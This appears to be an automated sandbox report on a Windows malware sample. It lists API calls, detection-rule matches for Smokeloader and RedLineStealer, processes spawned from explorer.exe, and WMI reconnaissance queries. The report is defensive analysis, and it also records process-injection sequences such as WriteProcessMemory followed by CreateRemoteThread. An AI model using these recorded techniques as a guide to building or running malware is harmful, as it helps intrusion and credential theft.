                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004015DF VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015DF
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004015E6 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015E6
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004015F2 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_004015F2
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014F5 NtAllocateVirtualMemory,7_2_004014F5
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014F8 NtAllocateVirtualMemory,7_2_004014F8
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 7_2_004014FB NtAllocateVirtualMemory,7_2_004014FB
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E4B92 RtlMoveMemory,NtUnmapViewOfSection,10_2_006E4B92
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E33C3 NtQueryInformationFile,10_2_006E33C3
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E342B NtQueryObject,NtQueryObject,RtlMoveMemory,10_2_006E342B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,10_2_006E349B
                  Source: C:\Windows\explorer.exeCode function: 13_2_00CB38B0 NtUnmapViewOfSection,13_2_00CB38B0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,15_2_00191016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,15_2_00191819
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 15_2_00191A80 NtCreateSection,NtMapViewOfSection,15_2_00191A80
                  Source: C:\Windows\explorer.exeCode function: 16_2_008C355C NtUnmapViewOfSection,16_2_008C355C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,18_2_02FE1016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_02FE18BF
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_02FE1B26 NtCreateSection,NtMapViewOfSection,18_2_02FE1B26
                  Source: C:\Windows\explorer.exeCode function: 19_2_012B370C NtUnmapViewOfSection,19_2_012B370C
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE29AC88_2_00007FF6DFE29AC8
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2A5348_2_00007FF6DFE2A534
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2B43C8_2_00007FF6DFE2B43C
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2DC208_2_00007FF6DFE2DC20
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE232208_2_00007FF6DFE23220
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2A78C8_2_00007FF6DFE2A78C
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE2213C8_2_00007FF6DFE2213C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E219810_2_006E2198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006EC2F910_2_006EC2F9
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006FB35C10_2_006FB35C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_0073443810_2_00734438
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006FB97E10_2_006FB97E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_006E6E6A10_2_006E6E6A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00705F0810_2_00705F08
                  Source: C:\Windows\explorer.exeCode function: 13_2_00CB1E2013_2_00CB1E20
                  Source: C:\Windows\explorer.exeCode function: 16_2_008C205416_2_008C2054
                  Source: C:\Windows\explorer.exeCode function: 16_2_008C286016_2_008C2860
                  Source: C:\Windows\explorer.exeCode function: 19_2_012B2A0419_2_012B2A04
                  Source: C:\Windows\explorer.exeCode function: 19_2_012B20F419_2_012B20F4
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040BC5C38_2_0040BC5C
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_00408C7A38_2_00408C7A
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040C88938_2_0040C889
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040D5C138_2_0040D5C1
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040C1AD38_2_0040C1AD
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_0040B70B38_2_0040B70B
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040BC5C39_2_0040BC5C
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_00408C7A39_2_00408C7A
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040C88939_2_0040C889
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040D5C139_2_0040D5C1
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040C1AD39_2_0040C1AD
                  Source: C:\Users\user\AppData\Roaming\eihchavCode function: 39_2_0040B70B39_2_0040B70B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\FDDB.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 006E7F70 appears 32 times
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 006E8801 appears 40 times
                  Source: 9VgIkx4su0.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.2340049741.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000004.00000002.2339931516.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/15@7/4
                  Source: C:\Users\user\AppData\Roaming\dghchavCode function: 38_2_00401490 GetCurrentProcessId,GetCurrentProcessId,GetCharWidth32A,CreateDCW,CreateDCW,FoldStringW,EnumSystemCodePagesW,CreateDCW,CreateHardLinkA,WinHttpOpen,InterlockedDecrement,_strlen,LocalAlloc,LoadLibraryA,LoadLibraryA,GetProcAddress,GetLastError,InterlockedCompareExchange,InterlockedCompareExchange,GetDiskFreeSpaceExA,LoadLibraryA,ReadConsoleInputW,DebugBreak,LCMapStringA,SetEnvironmentVariableW,LCMapStringA,SetEnvironmentVariableW,OpenEventA,GetLastError,GetFileAttributesW,GetShortPathNameW,LocalFlags,GetFileAttributesW,GetShortPathNameW,LocalFlags,RaiseException,SetFileTime,SetComputerNameA,InterlockedDecrement,LoadLibraryW,38_2_00401490
                  Source: C:\Users\user\Desktop\9VgIkx4su0.exeCode function: 0_2_00621706 CreateToolhelp32Snapshot,Module32First,0_2_00621706
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeCode function: 8_2_00007FF6DFE27138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,8_2_00007FF6DFE27138
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eihchavJump to behavior
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3E40.tmpJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: GxBn38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: O$b~38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: ":,x38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: ls/K38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: K`:38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: <'w38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: J}s`38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\dghchavCommand line argument: 7-T=38_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: GxBn39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: O$b~39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: ":,x39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: ls/K39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: K`:39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: <'w39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: J}s`39_2_00401840
                  Source: C:\Users\user\AppData\Roaming\eihchavCommand line argument: 7-T=39_2_00401840
                  Source: 9VgIkx4su0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FDDB.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;92&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;332&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;420&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;496&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;504&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;564&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;632&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;640&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;752&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;780&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;788&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;872&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;924&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;992&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;444&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;732&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;280&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1032&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1056&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1068&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1148&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1188&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1232&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1324&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1384&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1416&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1424&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1460&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1584&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1612&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1660&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1688&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1700&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1820&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1836&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1936&quot;::GetOwner
                  Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle=&quot;1944&quot;::GetOwner
